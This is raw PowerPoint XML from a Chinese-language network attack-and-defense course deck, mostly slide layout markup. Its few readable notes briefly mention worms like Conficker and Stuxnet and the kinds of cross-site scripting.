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895" r:id="rId2"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId145"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="338" r:id="rId4"/>
    <p:sldId id="437" r:id="rId5"/>
    <p:sldId id="438" r:id="rId6"/>
    <p:sldId id="449" r:id="rId7"/>
    <p:sldId id="456" r:id="rId8"/>
    <p:sldId id="457" r:id="rId9"/>
    <p:sldId id="458" r:id="rId10"/>
    <p:sldId id="459" r:id="rId11"/>
    <p:sldId id="460" r:id="rId12"/>
    <p:sldId id="461" r:id="rId13"/>
    <p:sldId id="439" r:id="rId14"/>
    <p:sldId id="440" r:id="rId15"/>
    <p:sldId id="581" r:id="rId16"/>
    <p:sldId id="441" r:id="rId17"/>
    <p:sldId id="442" r:id="rId18"/>
    <p:sldId id="443" r:id="rId19"/>
    <p:sldId id="444" r:id="rId20"/>
    <p:sldId id="445" r:id="rId21"/>
    <p:sldId id="446" r:id="rId22"/>
    <p:sldId id="447" r:id="rId23"/>
    <p:sldId id="448" r:id="rId24"/>
    <p:sldId id="584" r:id="rId25"/>
    <p:sldId id="462" r:id="rId26"/>
    <p:sldId id="590" r:id="rId27"/>
    <p:sldId id="592" r:id="rId28"/>
    <p:sldId id="463" r:id="rId29"/>
    <p:sldId id="467" r:id="rId30"/>
    <p:sldId id="468" r:id="rId31"/>
    <p:sldId id="469" r:id="rId32"/>
    <p:sldId id="470" r:id="rId33"/>
    <p:sldId id="471" r:id="rId34"/>
    <p:sldId id="472" r:id="rId35"/>
    <p:sldId id="473" r:id="rId36"/>
    <p:sldId id="474" r:id="rId37"/>
    <p:sldId id="582" r:id="rId38"/>
    <p:sldId id="583" r:id="rId39"/>
    <p:sldId id="475" r:id="rId40"/>
    <p:sldId id="476" r:id="rId41"/>
    <p:sldId id="477" r:id="rId42"/>
    <p:sldId id="478" r:id="rId43"/>
    <p:sldId id="479" r:id="rId44"/>
    <p:sldId id="480" r:id="rId45"/>
    <p:sldId id="481" r:id="rId46"/>
    <p:sldId id="482" r:id="rId47"/>
    <p:sldId id="273" r:id="rId48"/>
    <p:sldId id="300" r:id="rId49"/>
    <p:sldId id="301" r:id="rId50"/>
    <p:sldId id="483" r:id="rId51"/>
    <p:sldId id="484" r:id="rId52"/>
    <p:sldId id="485" r:id="rId53"/>
    <p:sldId id="486" r:id="rId54"/>
    <p:sldId id="487" r:id="rId55"/>
    <p:sldId id="488" r:id="rId56"/>
    <p:sldId id="489" r:id="rId57"/>
    <p:sldId id="490" r:id="rId58"/>
    <p:sldId id="493" r:id="rId59"/>
    <p:sldId id="494" r:id="rId60"/>
    <p:sldId id="495" r:id="rId61"/>
    <p:sldId id="496" r:id="rId62"/>
    <p:sldId id="497" r:id="rId63"/>
    <p:sldId id="499" r:id="rId64"/>
    <p:sldId id="500" r:id="rId65"/>
    <p:sldId id="501" r:id="rId66"/>
    <p:sldId id="502" r:id="rId67"/>
    <p:sldId id="503" r:id="rId68"/>
    <p:sldId id="506" r:id="rId69"/>
    <p:sldId id="507" r:id="rId70"/>
    <p:sldId id="509" r:id="rId71"/>
    <p:sldId id="510" r:id="rId72"/>
    <p:sldId id="508" r:id="rId73"/>
    <p:sldId id="511" r:id="rId74"/>
    <p:sldId id="512" r:id="rId75"/>
    <p:sldId id="587" r:id="rId76"/>
    <p:sldId id="586" r:id="rId77"/>
    <p:sldId id="513" r:id="rId78"/>
    <p:sldId id="514" r:id="rId79"/>
    <p:sldId id="515" r:id="rId80"/>
    <p:sldId id="516" r:id="rId81"/>
    <p:sldId id="517" r:id="rId82"/>
    <p:sldId id="518" r:id="rId83"/>
    <p:sldId id="519" r:id="rId84"/>
    <p:sldId id="520" r:id="rId85"/>
    <p:sldId id="521" r:id="rId86"/>
    <p:sldId id="522" r:id="rId87"/>
    <p:sldId id="523" r:id="rId88"/>
    <p:sldId id="524" r:id="rId89"/>
    <p:sldId id="525" r:id="rId90"/>
    <p:sldId id="526" r:id="rId91"/>
    <p:sldId id="527" r:id="rId92"/>
    <p:sldId id="528" r:id="rId93"/>
    <p:sldId id="529" r:id="rId94"/>
    <p:sldId id="530" r:id="rId95"/>
    <p:sldId id="531" r:id="rId96"/>
    <p:sldId id="532" r:id="rId97"/>
    <p:sldId id="533" r:id="rId98"/>
    <p:sldId id="534" r:id="rId99"/>
    <p:sldId id="535" r:id="rId100"/>
    <p:sldId id="536" r:id="rId101"/>
    <p:sldId id="537" r:id="rId102"/>
    <p:sldId id="538" r:id="rId103"/>
    <p:sldId id="539" r:id="rId104"/>
    <p:sldId id="540" r:id="rId105"/>
    <p:sldId id="543" r:id="rId106"/>
    <p:sldId id="542" r:id="rId107"/>
    <p:sldId id="544" r:id="rId108"/>
    <p:sldId id="545" r:id="rId109"/>
    <p:sldId id="546" r:id="rId110"/>
    <p:sldId id="547" r:id="rId111"/>
    <p:sldId id="548" r:id="rId112"/>
    <p:sldId id="549" r:id="rId113"/>
    <p:sldId id="550" r:id="rId114"/>
    <p:sldId id="551" r:id="rId115"/>
    <p:sldId id="552" r:id="rId116"/>
    <p:sldId id="553" r:id="rId117"/>
    <p:sldId id="554" r:id="rId118"/>
    <p:sldId id="555" r:id="rId119"/>
    <p:sldId id="556" r:id="rId120"/>
    <p:sldId id="557" r:id="rId121"/>
    <p:sldId id="559" r:id="rId122"/>
    <p:sldId id="560" r:id="rId123"/>
    <p:sldId id="561" r:id="rId124"/>
    <p:sldId id="562" r:id="rId125"/>
    <p:sldId id="563" r:id="rId126"/>
    <p:sldId id="564" r:id="rId127"/>
    <p:sldId id="565" r:id="rId128"/>
    <p:sldId id="566" r:id="rId129"/>
    <p:sldId id="567" r:id="rId130"/>
    <p:sldId id="568" r:id="rId131"/>
    <p:sldId id="570" r:id="rId132"/>
    <p:sldId id="571" r:id="rId133"/>
    <p:sldId id="572" r:id="rId134"/>
    <p:sldId id="573" r:id="rId135"/>
    <p:sldId id="574" r:id="rId136"/>
    <p:sldId id="575" r:id="rId137"/>
    <p:sldId id="576" r:id="rId138"/>
    <p:sldId id="577" r:id="rId139"/>
    <p:sldId id="578" r:id="rId140"/>
    <p:sldId id="579" r:id="rId141"/>
    <p:sldId id="580" r:id="rId142"/>
    <p:sldId id="588" r:id="rId143"/>
    <p:sldId id="589" r:id="rId14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5" autoAdjust="0"/>
    <p:restoredTop sz="94444" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="107" d="100"/>
          <a:sy n="107" d="100"/>
        </p:scale>
        <p:origin x="1632" y="168"/>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tableStyles" Target="tableStyle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3F2C117-D93C-46EC-8396-538A1BC9A4EC}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2020/12/29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524AD1-6104-4940-BDB3-1EB12E7C9A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5364" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{905CF2EC-3776-40CC-893E-838C6BBAD476}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>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利用该漏洞可很容易进行蠕虫攻击，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2008</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>月发现的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Conficker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>蠕虫、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2010</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>月发现的“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Stuxnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>”蠕虫都用到了该漏洞来实施攻击和传播</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24580" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{753F66DA-B38E-4C63-BD0B-B9040467330C}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>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字符串结束符</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ASCII</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0;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{99524AD1-6104-4940-BDB3-1EB12E7C9ADE}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>56</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="92393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反射型包含基于</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>型。根据触发的地点分，如果是在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对象上触发的漏洞，那么就是基于</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{99524AD1-6104-4940-BDB3-1EB12E7C9ADE}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>112</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="418273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524AD1-6104-4940-BDB3-1EB12E7C9ADE}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>113</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="300740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6E213D-1DC1-704B-89BD-57B5DD7A8936}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="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6" name="页脚占位符 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C975AE6-1424-CD46-A259-396340C03107}"/>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zh-CN" altLang="en-US"/>
              <a:t>网络攻防技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="灯片编号占位符 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5D5D00D-C1C7-8847-A289-9AFE57F0B019}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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947A58F-6F65-1348-ADCC-56440A88798C}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="424620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454F15-ACE6-BD45-9A93-B8F1166B4683}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="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6" name="页脚占位符 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BB67F2D-E02F-774D-AE10-4992315B1301}"/>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zh-CN" altLang="en-US"/>
              <a:t>网络攻防技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="灯片编号占位符 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83762AAF-C811-3B4F-97D2-1407B6F03300}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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0D421F5-19FE-154A-9C06-965F70A30D50}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1541903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C9ACFA-3592-5C4F-87AF-E6C7B29B9747}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="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5" name="页脚占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4679717-C88B-9C41-8B0B-23EB99088C40}"/>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zh-CN" altLang="en-US"/>
              <a:t>网络攻防技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{462065DA-3726-134B-8A0E-64F727A75FE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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EE1C75F-58EC-CD4A-9124-9628BE43FCE6}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3335540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0813" y="260350"/>
            <a:ext cx="2033587" cy="5759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260350"/>
            <a:ext cx="5953125" cy="5759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88290E-EE6A-1048-968D-2F6BDBB406DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="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5" name="页脚占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{827D1E14-A426-D54E-928D-8AC4CE827ABC}"/>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zh-CN" altLang="en-US"/>
              <a:t>网络攻防技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{380FBF81-921A-7A4B-9081-1B28599A691A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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307FE91-5BFF-6340-B1FD-97B2FC37F026}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="88008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a:t>单击此处编辑母版标题样式</a:t>
            </a:r>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1D83D42E-026A-41FC-A152-3191AC19EAF6}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>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FED1F23-8C03-F94F-856A-EE3DE8226796}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="927100"/>
            <a:ext cx="8991600" cy="4495800"/>
            <a:chOff x="0" y="584"/>
            <a:chExt cx="5664" cy="2832"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="AutoShape 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49DE3FF8-8809-DA47-A81A-D1244CD9B17E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB504D0C-DC7A-8A46-9410-F43CD5597748}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{982DB738-6EA1-0C43-8AA7-13925D9AE720}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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chemeClr val="folHlink"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Line 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03978093-2B3E-6A44-A6FC-FE7D7F75F1BD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5127" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1427163"/>
            <a:ext cx="8077200" cy="1609725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="4600"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51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zh-CN" altLang="en-US"/>
              <a:t>单击此处编辑母版副标题样式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76215FFE-E9A3-604F-8264-8733A1A086F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248400"/>
            <a:ext cx="2133600" cy="471488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51704536-D4A4-AB4A-88E2-D5C669ECA574}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6253163"/>
            <a:ext cx="2895600" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{213B1671-3A93-4342-9A2B-64680780CBD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553200" y="6248400"/>
            <a:ext cx="2133600" cy="471488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{58B68E79-01A0-3A4A-8E9D-27931DB921A0}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="422949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418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FD592B8-F1F1-E94B-A02C-47DB26187DCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="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5" name="页脚占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15E743A8-2CF1-1048-B69D-972BCF4E0EC5}"/>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zh-CN" altLang="en-US"/>
              <a:t>网络攻防技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11EA1DA3-1970-484E-9264-B7F41A54490B}"/>
              </a:ext>
            </a:extLst>
